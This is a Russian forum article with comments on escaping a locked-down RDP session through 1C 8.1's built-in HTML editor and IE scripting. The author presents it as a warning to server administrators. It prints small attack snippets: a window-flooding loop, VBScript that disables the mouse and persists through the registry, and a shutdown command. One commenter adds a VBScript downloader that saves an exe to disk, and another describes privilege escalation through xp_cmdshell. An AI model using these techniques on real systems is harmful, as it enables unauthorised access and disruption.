gifts2017

Взлом сервера с помощью 1С:Предприятие 8.1

Опубликовал Олег Пономаренко (O-Planet) в раздел Администрирование - Системное

Взлом - это углубленное изучение (с)

Работал с клиентом по rdp. Ночью, конечно же. Как это обычно бывает у фрилансера: кидают на мыло вопросы, дают логин и пароль - сиди, разбирайся до утра, почему что-то не проводится, проводится не так, не попадает в нужный отчет... 

Все бы было хорошо, но в этот раз второпях выделили мне не того пользователя, не с правами администратора, а с правами какого-то удаленного оператора, и передо мной открылся по максимуму урезанный интерфейс «восьмерки», без возможности смены. Свертываю 1С – вижу абсолютно пустой рабочий стол, даже кнопка «Пуск» отсутствует. Сразу видно, сисадмин постарался, чтобы этот самый «удаленный оператор» не лез куда ему не нужно, не смотрел, что не нужно, и кроме пары рабочих документов в 1С ничего не мог открыть. Но мне-то нужно! Нужен конфигуратор, например. Даже – не конфигуратор: достаточно «прощупать» базу собственным отчетом, который бы выводил то, что мне нужно, в табло. Но вот вопрос: как его забросить на компьютер, где сделано все возможное, чтобы этого не допустить? 

Все гениальное возникает на стыке технологий. Впрочем, и абсудное тоже. Интуитивно тыкаю кнопку «Файл» в меню 1С – единственное место на экране, где хоть что-то есть. Вижу пункт «Новый», вижу в списке среди прочего html-документ… 

Решил попробовать: вдруг разработчики 1С таки оставили возможность «пошалить». Перехожу к закладке «Текст», стираю всю сгенерированную там муть, и пишу простенький код:

<html><head>
<script language=javascript>
alert("Hello, world");
</script>
</head><body></body></html>

Затаив дыхание, щелкаю по просмотру… На экране появляется веселое окошечко с приветливым заголовком Microsoft Internet Explorer. Ну надо же! А я и не надеялся… 

Ну чем Explorer с включенными скриптами - не лазейка на закрытый компьютер через rdp? При желании, я его теперь даже отформатирую удаленно!

Но форматировать пока рано: нужно закинуть туда всего лишь свой отчетик. Для этого использую мой любимый файлообменник, а в открытом для смелых идей компоновщике web страниц вместо жизнерадостного алерта с «хелловорлдом» пишу более претенциозное: document.location=”http://www.webfile.ru”; Жму просмотр, забираю скинутый только что свой отчет, сохраняю на рабочем столе для разнообразия. Не люблю пустующих рабочих столов… ;)

К счастью, в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой, и я скоро вывожу в табло те данные по регистрам, которые меня интересуют, а параллельно работает изощренная фантазия... 

Что мешает таким же образом, через файлообменник кинуть на удаленный, закрытый от всего (почти от всего) компьютер, скажем, Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь? Дома-то работать сподручнее! Конечно, только если это – сервер. А если не сервер, то значит, там есть сеть, а в сети тоже можно найти что-нибудь интересное… 

Впрочем, вместо тотала можно забросить и что-то более веселенькое, да все, что угодно! Забросить и запустить прямо с рабочего стола, например, собственную программу, работающую с реестром… А можно и не с рабочего стола, а прямо из эксплорера, благо, он сам дает возможность не оставлять следов, когда спрашивает по поводу exe-файла, сохранить его, или запустить… Ну чем не взлом?

Кульминацией всего было то, что я вспомнил про свою переписку когда-то с одним хаккером, и про его восхищенные излияния про возможность использования в эксплорере разных ole-объектов, например, вот этот: ActiveXObject("Scripting.FileSystemObject"); Зачем, спрашивается, коммандер, когда есть такое…

Кстати, очень легко можно было бы этот комп завесить, если бы на то подвернулся повод. Как, спрашивается, проще всего завесить Windows – если не созданием этих самых windows? Для этого, в полюбившемся нам компоновщике меняем вторично содержимое нашего скрипта, и вместо window.location ставим:

for(var k=0; k<10000; k++)
  window.open("about:blank");

Попробуйте у себя ради прикола, конечно, снизив число в цикле хотя бы до 5… 

Но поговорим еще о скриптах. Поскольку могучий Эксплорер поддерживает и WBScript, то ни что не мешает отправить сервак на перезагрузку, если незадачливый работодатель сделал вас всего лишь удаленным оператором. Понятно, что такая процедура – весьма не желательна в разгар рабочего дня, когда на сервере висит куча других удаленных операторов и не только…

ExitWindows, может, в XP и не сработает, а вот rundll32 krnl386.exe,exitkernel должен :)

Но не будет столь экстримичны, для начала, ограничимся запретом мыши на сервере:

<script language="vbscript">
<!--
Set Shell=CreateObject("WScript.Shell") 
Shell.Run("rundll32 mouse,disable")
-->
</script>

А если вы - приверженец старой школы, и считаете мышь вообще вредной ошибкой в истории компьютеров, то запретите ее навечно, прописав это в реестр с помощью того же VB!  

WshShell.RegWrite"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesMad", "rundll32 mouse,disable"

Конечно, делать я ничего такого не стал, а клиенту утром сообщил, что их сисадмину стоит серьезно обеспокоиться. Собственно, и сюда публикую только для того, чтобы коллеги, занимающиеся администрированием серверов 1С, учли подобную лазейку и предприняли необходимые меры. 

См. также

Подписаться Добавить вознаграждение

Комментарии

1. Igоr Sаulеviсh (gutentag) 05.02.09 00:50
...я как бухгалтер ничего не понял, но покажу статью на работе программерам, может что втолкуют в меня :)
2. Sheyko (Sheyko) 05.02.09 01:40
расказ про частный случай не настроенного сервера

//в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой
кто-же такую дыру оставляет
//я скоро вывожу в табло те данные по регистрам, которые меня интересуют
про РЛС и права на регистры тоже никто не слышал
//Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь
база может лежать и не на этом компе. в случае терминал=сервер права win-пользователя на каталог с базой должны спасать
3. Олег Пономаренко (O-Planet) 05.02.09 01:54
// кто-же такую дыру оставляет
А если по работе требуется?
// база может лежать и не на этом компе
Ну да. Я и пину "если"

А вообще, все правильно: если настраивать все путем, то, думаю, не пройдет. Просто тут ситуация интересная: без 1С все было настроено путем. 1С вносит свои коррективы, собственно, на это и хотел обратить внимание.
4. Сhe Burashka (CheBurator) 05.02.09 02:59
Не увидел в статье упоминания про far и шпи...
5. Артур Аюханов (artbear) 05.02.09 06:57
(0) Если у твоего удаленного оператора нет прав админа, ты нифига не сможешь прописать в системный реестр, HKLM и т.д.
Открытием кучи окон IE ты также завесишь, как правило, только текущий сеанс, хотя, конечно, расход памяти на сервере будет огромный :)
Хотя 2000 народ умудрялся почти подвешивать, открывая огроменные отчеты из 77 за несколько лет :)

Мышку заморозишь ты только для текущего сеанса, который любой админ может удаленно или через тот же терминал завершить.
Форматировать без админских прав ты также не сможешь.
Перезагрузить можешь также только при наличии прав.

Доступ к инету также спокойно обламывается с помощью нормального файервола, настроенного на разграничение не по компам, а по именам пользователей. Да и доступ с основного сервера в инет - это очень плохо :)

И что у нас в итоге остается :) ?
Spartan; annak2980; forevil; smit1c; hulio; MrDen; lustin; sasha_r; Gamm; German; JohnyDeath; Shurik; +12 Ответить 1
6. Андрей Скляров (coder1cv8) 05.02.09 08:09
(0) Почувствовал себя хакером? ) Нда...
hulio; sasha_r; +2 Ответить 1
7. Сандро (Shurik) 05.02.09 08:35
Это все косяки и/или лень админа.
8. Олег Пономаренко (O-Planet) 05.02.09 11:22
(4) Far и есть главный шпингалет

(5) Смыс - не в том, что я чего-то не могу, а в том, что имеется возможность покопаться на компе. Например, я, ища место, куда бы сбросить свой отчет, наткнулся на диск D того компа, на котором были папки Клиенты. Я не присматривался особо, но отметил, что в этой папке лежит куча инфы, которкю, предполагалось, не должен видеть удаленный оператор. Тем более, не должен иметь возможности удалять. Вообще, если тему развивать, то можно вспомнить, что имеются способы перестройки прав юзеров в Windows, и вообще, самое большое зло - от кнопки F8

(6) Хаккером я себя чувствовал лишь однажды, когда начальство (я не всегда был фри) поставило задачу сломать до конца недели защиту на одном САПРе для ЧПУ от Siemens, потому что слишком дорогой он был... ;)

(7) Ага. О том - и речь.
9. Максим Костюкевич (MaxiSoft) 05.02.09 11:22
вот пока не совсем понял для чего такой извращенный способ для того чтобы просто открыть удаленный отчет или обработку! Ведь если есть права для получения данных из интернета достаточно просто нажать кнопку "Открыть" и в строке имя файла набрать "http://server_id/tools_id.epf" и все 1с спокойненько запустит данную обработку или отчет! Ну а дальше только фантазия и возможности языка 1С.
10. vip (vip) 05.02.09 12:06
(8) > Far и есть главный шпингалет
Не. Не главный.
11. mrden (MrDen) 07.02.09 00:03
А если доступ по RDP не дали то тогда как?
12. Олег Пономаренко (O-Planet) 07.02.09 04:25
13. Сергей Дудаков (Anything) 07.02.09 12:06
Если есть меню "Файл" -> "Открыть..." и доступ к жесткому диску, можно запустить любую программу.

Для этого в окне выбора кликаем на ней правой кнопкой и выбраем пункт "Открыть". Программа и запустится.

Например, можно было попробовать залезть в папку Windows и запустить Explorer.exe. Возможно, и кнопка "Пуск" появилсь бы...
14. Аркадий Кучер (Abadonna) 07.02.09 12:19
(8)>Far и есть главный шпингалет
Да уж! Я лучше "Кассирочку" куплю, чем этого долбанного фара юзать буду ;)
defini; DMSDeveloper; O-Planet; +3 1 Ответить 1
15. Сергей Сытько (8SiriuS8) 07.02.09 13:13
А еще можно на RDP залить файло следующим скриптом... vbs

Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://ссылка на файл ", 0 'адрес где лежит файл
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "C:\file.exe", 2 'куда файл сохранять

и чтоб от такого скрипта зашититься сисадмину крепко репу почесать надо будет...
O-Planet; +1 Ответить
16. Sasha_H (logarifm) 07.02.09 14:50
У меня аналогично был случай только там 1С 7.7 и был доступ к конфигуратору. Но я не мог закачать файл им на сервер так как ИЕ зарезали доступ, а зайти и поменят не могу доменное правило. Блин... Дамаю... Но быстро припоминаю одну ХП в скл. sp_cmdshell, но сходу встретлся с проблемой необходимо узнать пароль sa на sql сервер. Ну благо то, что есть обработки в инете, я быстренько нашел взлом пароля sa из 1С. Буфер обмена работал это тоже благо я быстренько ее через буфер перегнал и запуск. Пароль узнал... А далее, все дело техники! Захожу в СКЛ но опа, админ постарался и прикрыл эту системную хранимку, еще чуток пошарив в инете я нашел команды как ее открыть, открыл эту хранимку и опля уже имею доступ к коммандной строке да еще из правами администратора. Хех жаль только , что локального админа, я быстренько с помощью команды создаю локального админа и на ура вхожу под локальным админом! Все закачую все что нужно... У меня не было за правило взломать, а сделать )) Вот собственно мой опыт по взлому.
17. Drock (d.snissarenko) 07.02.09 17:56
Извините..., но этому бояну уже лет, столько сколько rdp, настоящий бы админ, залочил бы контекстное меню проводника, скрыл диски, запретил гуляние по дискам, только своя папка, запретил открытие ослика. Поэтому к взлому это никакого отношения не имеет, тем паче в системе от обратного (все разрешено, ничего не запрещено). Попробуйте в лине по удаленке с правами юзера ченить замутить :) .
18. Drock (d.snissarenko) 07.02.09 17:58
в этом плане групповые политики рулят
19. Roman (1cHyb) 08.02.09 00:07
ИМХО лучше бы работал, а не хнёй занимался! =)
smit1c; sasha_r; +2 Ответить
20. Максим Сухов (MaxS) 08.02.09 07:53
В 1С жмем Файл - Открыть, на любой папке контекстным меню Открыть и попадаем в Windows проводник, ищём исполняемый файл и запускаем.
Пока этих возможностей хватает не прибегая к другим более изощрённым. ;)
21. Дмитрий Воробьев (vde69) 08.02.09 10:32
а учитывая, что сервер 1с работает под правами локального админа (а часто его ставчт под правами доменного), то кинув простенький скрипт в привелигерованый модуль можно ломать сервер, а от туда вообще все :)

в (0) админ защищал не то :)))
22. gilv (Gilev.Vyacheslav) 08.02.09 14:44
(0) так понимаю начитавшись тинейджеровкого хакер.ру автора понесло :)))
23. fantasy2 (fantasy2) 08.02.09 14:54
Простой способ:
в терминале жмём
Ctrl+Alt+End - открвается Диспечер задач
Файл - Новая Задача - "explorer" - Аля Windows !!!..
или в 1С
Файл - Открыть - Окно выбора файла
выбираем любую папку -на ней правцю кнопку мыши - Проводник
- Аля Windows !!!..
24. Сергей (seermak) 08.02.09 15:04
Я представил, сколько прочитавших все вышеизложенное будут пытаться подломить центральный сервер своей конторы(просто ради интереса , на будущее - пытливые умы).Дайте им еще несколько действительно действенных советов! ;))
25. Аркадий Кучер (Abadonna) 08.02.09 15:36
(23)>или в 1С Файл - Открыть - Окно выбора файла
Ювыбираем любую папку -на ней правцю кнопку мыши - Проводник
А зачем так сложно? В окне выбора баз жмем кнопку "изменить", а там правую - Проводник.
Олежа "изобрел" всем известный способ, но по- русски: как те отолярингологи
26. Олег Пономаренко (O-Planet) 08.02.09 19:02
(23) (25) Нет, не пройдет. В моем случае админ сделал что-то, что по трем клавишам ничего не происходило. Я это проверил прежде всего. В (21) правильно написано, что админ защищал не то. Т.е., если туда зайти без 1С, то можно только смотреть на пустой рабочий стол. Собственно, я и хотел донести эту мысль, что если стоит 1С, то сервер нужно защищать несколько в ином ключе.
(22) Надо же, какие сайты ты знаешь. Тож надо глянуть ))
27. gilv (Gilev.Vyacheslav) 08.02.09 21:21
(26) ты бы почитал http://kb.1c.ru/articleView.jsp?id=37 (конешь понимаю, что проще велосипед изобретать, чем читать чужое)
29. Олег Пономаренко (O-Planet) 08.02.09 23:48
(28) Как раз, 1С. Потому что доступа по rdp ни к чему другому фирмам не требуется, а 1С по rdp сопровождается везде. Я постоянно делаю что-то удаленно, и ни разу не видел, чтобы админы учитывали возможность из 1С копаться в их компьютере. Возможно, многие сисадмины просто достаточно смутно представляют, что такое, 1С. Вот для таких и написал.
30. Дуб (Дуб) 09.02.09 08:27
(0) Вообще-то, права на сервер определяются не "дырками" 1С, а степенью криворукости админа. Если каждому встречному-поперечному оставлены полные полномочия - рано или поздно такая система может упасть. Вопрос времени и интереса со стороны доброжелателей.
А так, в целом, насколько помню, доступ через html уже был описан ранее.
Другое дело, если автор додумался сам - то, конечно, молодец. Но описанного ранее этого не отменяет.
32. Sasha R. (sasha_r) 09.02.09 12:20
тут, я смотрю, та же бодяга что и на клерк.ру

статья не про взлом сервера при помащи 1с, а про кривые руки недальновидного админа этого сервака и про ненастроенные политики безопастности :(

аффтар, похоже, желает себе дешевой популярности. ну-ну
33. Дуб (Дуб) 09.02.09 12:29
Хватит автора клевать. Если он сам нашёл этот путь действия - это очень хорошо его характеризует. Не суть важно, что ко "взлому" это не относится.
DMSDeveloper; sasha_r; +2 Ответить 1
34. Sasha R. (sasha_r) 09.02.09 12:30
2Дуб: ну так назвал бы статью "как я нашел дыру в сервере", а не "взлом сервера при помощи 1С". Разница есть, кмк - причем довольно ощутимая :)
35. Артур Аюханов (artbear) 09.02.09 13:35
ОФФ.
(14) Ставлю минус за "долбанный фар" :(
ЗЫ обещал себе не минусовать комменты, но "долбанный фар" достоин минуса, и не одного.
Я, наоборот, ТК не люблю с давних пор, а Фар обожаю за скорость :)
36. Олег Пономаренко (O-Planet) 09.02.09 13:54
(33) Люблю js, потому и нашел легко способ его применить. Назвал "взлом", чтобы привлечь внимание админов к теме, только и всего.
37. Аркадий Кучер (Abadonna) 09.02.09 14:09
(35) Ставлю минус "за ТК не люблю с давних пор".
Квиты ;)
Минус в уме так же vip_у, Чебурашке и прочим "подфарникам" :)))
38. Аркадий Кучер (Abadonna) 09.02.09 14:11
(37) Кстати, заметь, написать - написал, но минус ставить не стал ;)
"Фар обожаю за скорость"
И куда вы всё торопитесь?
39. Олег Пономаренко (O-Planet) 09.02.09 14:17
(38) Они - болящие :) Far - это ублюдочный NC
defini; vasilykushnir; Abadonna; +3 3 Ответить 1
40. Артур Аюханов (artbear) 09.02.09 14:32
(39) Также минус :)
Нортон в свое время был палочкой-выручалочкой для многих вещей.
ЗЫ ну и чтобы плюс уравновесить :)
MarSeN; markers; +2 Ответить 1
41. Василий Демидов (Душелов) 09.02.09 14:33
Дос навигатор - наше все! :)
markers; Dimasik2007; vasilykushnir; +3 Ответить 1
42. Артур Аюханов (artbear) 09.02.09 14:35
(38) Ну типа хочется же использовать всю мощь компьютера, а не быть белым человека из старой поговорки индейцев апачи - "Белый человек - это тот, кто сидит перед стеклянным экраном и смотрит на песочные часы" :)

ЗЫ Еще с Вин 3 ненавижу эти часики :)
43. Аркадий Кучер (Abadonna) 09.02.09 14:39
У тотала есть одно супер-преимущество - для него есть МОЙ ПЛАГИН, полноценный, а не та жалкая поделка, что под фар идет :)))
44. Олег Пономаренко (O-Planet) 09.02.09 14:47
А кто-нить "Фрегат" юзал? :) Могу любитенлям фара порекомендовать wd вместо Word, кто помнит такой текстовый редактор. Кстати, очень хороший для 286. А вообще, стоит on-line игруху создавать уже на тему тотальных войн, т.е. истребления культа фаропоклонников доблестными рыцарями TC :)
45. Василий Демидов (Душелов) 09.02.09 14:48
Я смотрю, тут у нас никто не пользуется командной строкой... Ну-ну :)
MegaMouse; MrDen; artbear; +3 Ответить 2
46. Vasily Kushnir (vasilykushnir) 09.02.09 15:03
(40) Тогда минус уравновешиваю. :-)))
(41) А вот эту штукойовину я любил - из толпы VC NC FAR очень выгодно выделялся. Прав Планет - новые времена диктуют новую моду: кто бы что ни говорил, но время ДОС-ориентированных менеджеров благополучно уходят. Не хочу их напрасно хулить - для каждого овоща свой сезон. Так что можно много чего доказывать, но каждый сходит с ума по-своему: у кого вилка в левой руке, а у кого котлета в правой...
47. Альтаир (Altair777) 09.02.09 15:10
(44) Все что угодно, только не Фрегат! :-)

Мало нам браузерных войн, вы еще и файл-менеджерную устроили.
Может, на форуме раздел сделать "Самое лучшее ПО в различных категориях"?
И там сражаться :-)
48. Артур Аюханов (artbear) 09.02.09 15:15
(45) Ага, про ком.строку верно замечено :)
49. Vasily Kushnir (vasilykushnir) 09.02.09 15:18
(45), (48) Ага... А потом спрашивают, что такое bat- файл и с чем его жрут, извиняюсь - кушают....
Кстати, на той технике что работал до виндов коммандные файлы имели расширение сом (представляете как поначалу путался?).
50. (das) Афанасьева Светлана (das) 09.02.09 15:47
Тема "Защиты серверов и т.д.", которую затронул O-Planet, актуальна для многих. Я с удовольствием прочитала и статью, и комментарии. И, ведь, совсем неважно какое ПО использовать (это я к нашим ГУРУ обращаюсь). Не у всех конечных пользователей настроена система защиты информации должным образом.
Поэтому, искренне считаю данную тему актуальной для многих... Поэтому (+)
vasilykushnir; +1 Ответить 3
51. Vasily Kushnir (vasilykushnir) 09.02.09 15:55
52. Альтаир (Altair777) 09.02.09 16:33
(50) Если бы автор еще рассказал как правильно настроить политики безопасности, то и я бы плюсик поставил.
Или хотя бы в шапке дыл ссылочки на статьи, рассказывающие об этом.
А то получается, что озвучена только проблема.
53. Vasily Kushnir (vasilykushnir) 09.02.09 16:50
(52) А если автор не сисадмин? Он обозначил проблему - остальные пусть на ус мотают. У меня к примеру эта проблема так остро не стоит - парочка физических внушений ретивым юзерам мужского полу и порция сквернословия юзерам женского полу - и все решилось полюбовно: они не нарушают - я не наказываю.
54. Vasily Kushnir (vasilykushnir) 09.02.09 16:50
55. Альтаир (Altair777) 09.02.09 17:18
(53) Хорошо, может я сам немножко разгребусь и напишу :-)

И, кстати, при чем тут 1С 8.1? Из под 7-ки точно также ломается.
56. Олег Пономаренко (O-Planet) 09.02.09 20:37
(55) 7.7 не имеет встроенного эксплорера с загибоном на макетирование по кнопке "Файл" =)
57. Альтаир (Altair777) 09.02.09 20:40
(56) 7.7 имеет возможность создать файл при открытии через правую кнопочку серого грузына. Хотя не факт, что серого :-)
58. Drock (d.snissarenko) 10.02.09 21:57
http://citrix.pp.ru/forum/viewtopic.php?t=3426&highlight=Explorer

не деритесь девочки ))) - я эту тему 3 год назад запалил у себя, у меня тогда домена даж не было еще, а о групповых политиках я имел смутнейшее представление, а заходили в базу клиенты, которые удаленно заявки клепали себе.
59. Альтаир (Altair777) 11.02.09 00:02
(58) > не деритесь девочки )))

это ты кому? нам тут своих хватает флеймистов, так еще и с Мисты пожаловали :-)
http://www.forum.mista.ru/users.php?id=17850
60. Сhe Burashka (CheBurator) 11.02.09 00:49
На старой работе поднял домен и путем раздал всякие права и ограничения по группам, подразделениям, и т.д. вплоть до принудительной установки корпортаивных обоев и ограничений на запуск приложений - после этого ввод нового юзера заключался во включении его в нужные группы. все. работало года полтора. После ухода и сдачи дел - ОТСОСЕРЫ переставили домен и накатили политики "по умолчанию" - т.е. тупо поставили сервак... На вопрос - а зачем? ответ был простой: у вас там очень сложно было сделано... что сказать - ОТСОСЕРЫ...
Анекдот в тему:
идет операция, хирург, ассистенты и пр.
- Сестра, скальпель!
- Сестра, томпон!
- Сестра, отсос!
- сестра! ОТСТОС - это инструмент!
61. Drock (d.snissarenko) 11.02.09 07:10
(59) так для проформы зайди тут в мой профайл и погляди когда я тут зареган :) и когда ты.
62. Альтаир (Altair777) 11.02.09 09:05
Это я видел, ну и что?
А ты так просто зайди в http://infostart.ru/community/people/ и посмотри где я, а где ты?
И рейтинги можешь посмотреть: мой +189, твой +78.
P.S. Кстати, тебе большой минус, что ты на 2 года и почти 3 месяца раньше меня зареган и такой отсталый :-)
63. Drock (d.snissarenko) 11.02.09 10:17
Ну вот и начали меряцо :) , 1с не мой профиль, это хобби :))
64. Альтаир (Altair777) 11.02.09 10:35
(63) ты сам начал меряться

58. Drock 10.02.2009 21:02:24
не деритесь девочки )))

поэтому я тебе и сказал
65. Drock (d.snissarenko) 11.02.09 14:41
Это я сказал к тому, что флейма не по делу развели аж на 3 страницы коментов, если серьезно подходить к вопросу, то нормальный админ политиками так может кастрировать винду, что не один один/неодинэсник ее не разлочит, а то, что у людей разгильдяйство это другой вопрос, меня этот вопрос озадачил, как я ваял выше, в связи с тем, что 1с по удаленке юзали покупатели.
66. Drock (d.snissarenko) 11.02.09 14:42
67. Drock (d.snissarenko) 11.02.09 14:43
вот если бы он тему обозвал взлом сервера с помощью SAMinside :), без прав и доступа к cmd, было бы интересно...
69. Альтаир (Altair777) 11.02.09 14:49
(65) Какого флейма? И кто? Лично я?
А вот лично ты развел. Го на Мисту! :-)
70. Drock (d.snissarenko) 11.02.09 19:49
Я не я и лошадь не моя [мама мама. меня обижаюююють...]....
Прежде чем кого-то, куда-то посылать, прочти внимательно первые 3 страницы комментариев и поймешь откуда уши выросли в моем первом посте к данной статье.
Так что вопрос флейма считаю закрытым....
Свое мнение к вопросу я высказал в своем первом посте, если хочешь поговорить о флейме или померятся еще чем-то, то милости прошу в личку.

PS// о замерах...
... я считаю, свой рейтинг не по плюсам за комментарии, а по плюсам за статьи и программы, так что твои 189 ниочем отминусуй соточку
71. Альтаир (Altair777) 11.02.09 19:58
(70) Я-то прочитал, а если бы и ты это сделал, то увидел бы мои комменты по этому поводу.
Вопрос флейма и я буду считать закрытым, когда ты перестанешь троллить.

А по поводу рейтинга за программы: у меня 57, у тебя 28 :-)

А статьи твои были написаны за царя Панька (кроме последней) и потеряли свою актуальность. Кстати, а твои программы еще древнее.

По поводу лички. Обозвал ты меня и 0-Планета девочками (а возможно и остальных участников обсуждения) в открытую, так что и ответ ты получил в том же виде.
72. Drock (d.snissarenko) 11.02.09 20:28
Ахтыбожемой, да успокойся ты уже, как дите малое повелся
73. Drock (d.snissarenko) 11.02.09 20:32
Заметь, статья из популярных не падает. О-планету таки хорошо...
74. Альтаир (Altair777) 11.02.09 20:58
(72) Сюсюкаться ты со своими детками будешь.
(73) мда... долго тебя не было на ИС.
75. Drock (d.snissarenko) 12.02.09 06:55
(74) "Не будешь" - а уже .
Какие-то проблемы с моим возвращением?
76. Аркадий Кучер (Abadonna) 12.02.09 07:24
(64) Т.к. в фразе "не деритесь девочки )))" не стоит положенная по всем правилам русского языка запятая, фраза обращением считаться не может ;)
Так что зря ты к ней "цепанулся"
77. Альтаир (Altair777) 12.02.09 08:59
(76) запятая не стоит просто от безграмотности или от торопливости написать гадость.
Кстати, Аркадий, фиксин по этому поводу написал бы "буквоедство детектед" :-)
78. Drock (d.snissarenko) 12.02.09 10:06
автор поставил тире :), а о безграмотности и бездуховности автора не тебе судить, поэтому автор предложил тебе все пожелания писать в личку, либо заведи с автором дискуссию на эту тему на форуме, в разделе курилка.
Если ты это принял близко к сердцу, то это твои проблемы, за отсутствие чувства юмора автор ответственности не несет.
79. Олег Пономаренко (O-Planet) 12.02.09 17:36
И кто-то еще Фиксина обвинял во флуде и неконструктивизме. Фиксин - падаван по сравнению с отдельными джедаями флуда :(
80. Альтаир (Altair777) 12.02.09 17:46
Прежде чем говорить о том, что кто-то флудит, не мешало бы узнать значение этого слова. Если не учитывать, что слово иногда «флуд» используется как синоним слова «флейм», то лично я не флудил.
Да и не флеймил, кажется.
81. Альтаир (Altair777) 12.02.09 17:50
А если кто-то считает нормальным, когда его (именно "его", а не "ее") называют девочкой..... - идите в аську или в личку, имхо.
82. Сhe Burashka (CheBurator) 12.02.09 18:22
Але, горячие финские парни Альтаир и Дрок! спокойнее!!! спокойнее!!! Не доросли вы еще пиписьками меряться!!! ;-)
83. Альтаир (Altair777) 12.02.09 19:01
(82) Может я и не дорос, зато пиписька доросла. Имхо... :-)

P.S. Если Дрок(гыгыгы (с)фиксин) писать сюда больше не будет, то и я не буду.
P.P.S. Я просил одного из Админов удалить отсюда все комментарии, начиная с 58.
84. Сhe Burashka (CheBurator) 12.02.09 19:12
(83) ты это.. осторожнее - а то пиписька перевесит, упадешь, лицо разобьешь...
;-)
..у админов политика - ничего не удалять...
85. Олег Пономаренко (O-Planet) 12.02.09 19:27
(80) Да мне по бубну флейм или флуд! Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой. А потом просьбы админам снести пол топика флудофлейма. По теме, если не понимаешь шутливого обращения, приемлемого на профессиональных форумах между коллегами, то это действительно, только твоя проблема.
86. Василий Демидов (Душелов) 12.02.09 19:29
(85) Ладно, девочки, не ссортьесь! :))))))))))
87. Альтаир (Altair777) 12.02.09 19:40
(85) зато ты нифика не делаешь как модератор.
А используешь свои права в корыстных целях. Когда это тебе выгодно.
Шутить я позволяю. Друзьям. А не известно кому неизвестно из какого небытия вылезшим.
Да и мне по бубну. Что этот срач (с подачи Дрока), поднялся именно здесь.
Так как статейка ниочем. О тупом админе, который не умеет использовать политики безопасности.

P.S. Я хотел прекратить (см 83). Но мне не дали.
P.P.S. (85) я мог бы еще детальнее разобрать, но не вижу смысла.
88. Олег Пономаренко (O-Planet) 12.02.09 19:47
(87) А ты спросил, есть ли у модераторов возможность чистить здесь сообщения? Очень бы оно не помешало. Статью можешь считать ниачем.
89. Сергей Лунев (luns) 12.02.09 19:51
Жили-были старик со старухой. Детей у них не было. Живут - как кошка с собакой: не то что каждый день, а что ни час, то и пыль до потолка. Он ей слово, она ему - десять. Он ей двадцать, она - сто! Уж и забыли, как добрые слова говорятся, все криком да с бранью. Как-то старуха пожаловалась соседям:
- Худо живем! Я ему слово - он мне десять! Я ему двадцать, он мне - сто! Чуть не до драки - не то что каждый день, а и каждый час, покуда вместе...
Ей и присоветовали:
- Сходи в соседнюю деревню, там старик есть мудрый, знахарь, он поможет!

Пошла старуха. Пришла, обсказала. Старый тот знахарь взял склянку, налил в нее воды, пошептал над ней и подает бабке:
- На! Как только старик твой неладно скажет, ты хлебни воды из склянки-то да со святой молитвой и держи во рту. Не сплюнь и не сглотни! Держи, пока не замолчит путем. И уж тогда - сглотни. Помни!

Только пришла старуха домой, ее старик - тоже на порог. С работы он, голодный, обедать требует, а у нее не готово, проходила сколько времени... Вот и зашумел он на нее. А она - раз! - и хлебнула из склянки и молча быстренько на стол собирает уж что есть. Он ей: "Онемела, что ль?" Молчит старуха, молитву святую в уме творит. Удивился старик и тоже замолчал. Так и пошло. Чуть он зашумит, она - раз - и хлебнет из склянки... Радовалась старуха, хвалилась соседям: помог знахарь. И старик не раз говаривал: чудо, старуха-то наладилась!
annak2980; vasilykushnir; +2 Ответить
90. Альтаир (Altair777) 12.02.09 19:52
(85) > Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой

Я "придирался" к:
1) fixin - no comment
2) LenaTorpeda - забанен
3) vacancy9 - забанен
4) wictorovichvadim (примерно кажется так) - забанен
5) toypaul - еще здесь :-)
6) ukrandruha - забанен

кого-то упустил?
91. Альтаир (Altair777) 12.02.09 19:54
(88) > А ты спросил, есть ли у модераторов возможность чистить здесь сообщения?

еще раз повторяю (см.83). Я просил не Модера, а Админа
92. Олег Пономаренко (O-Planet) 12.02.09 20:00
93. Сhe Burashka (CheBurator) 12.02.09 20:04
ух.. хорошо что я не придирчивый.. в 95% времени....
94. Сhe Burashka (CheBurator) 12.02.09 20:05
но мну реально прет ржач... я уже стал побольше времени даже на партнерский форум и проклаб уделять...
95. Альтаир (Altair777) 12.02.09 20:08
(92)
Это твое право. Но не обязанность. Обязанности у тебя другие. А, то что ты их не выполняешь - конечно, не может быть предметом гордости.

Скольким людям за последний месяц-два ты помог на форуме?
Лично я - немногим, хотя и старался. А ты хоть кому-то?
имхо, больше всех - Ёпрст.
96. Олег Пономаренко (O-Planet) 12.02.09 20:18
(95) Да не люблю я подсчитывать. И ко мне больше в личку обращаются, также пишут на сайт. Да и по-разному мы с тобой понимаем помощь. Я - вот так: http://infostart.ru/projects/445/ . А ты, похоже, как в (90) :))
97. Сhe Burashka (CheBurator) 12.02.09 20:25
(96) хватить пиарить шпингалеты!!!!
Altair777; +1 Ответить
98. Альтаир (Altair777) 12.02.09 20:28
(96)
> Да не люблю я подсчитывать.
Я задал простой вопрос. Про твою помощь на форуме.
Скольким? Порядок хотя бы назови. 0?

> А ты, похоже, как в (90) :))
Это твое субъективное мнение.

> И ко мне больше в личку обращаются
А ко мне не только в личку тут, на ИС пишут, но еще и в аську.
И я никому не отказал. Вот вчера буквально задали мне вопрос, на который я не смог ответить. И я обратился за помощью к своему знакомому.
Но я все это не выставляю напоказ и не самопиарю, как ты сделал в (96).
99. Олег Пономаренко (O-Planet) 12.02.09 20:30
(98) >> Но я все это не выставляю напоказ
Угу ))

А в 90 я просто "ответил на твой простой вопрос". Чем помощь на форуме лучше помощи в разделе "Программы"?
100. Альтаир (Altair777) 12.02.09 20:32
(99)
> А в 90 я просто "ответил на твой простой вопрос"

Прицел сбился? 90 - это мой пост.
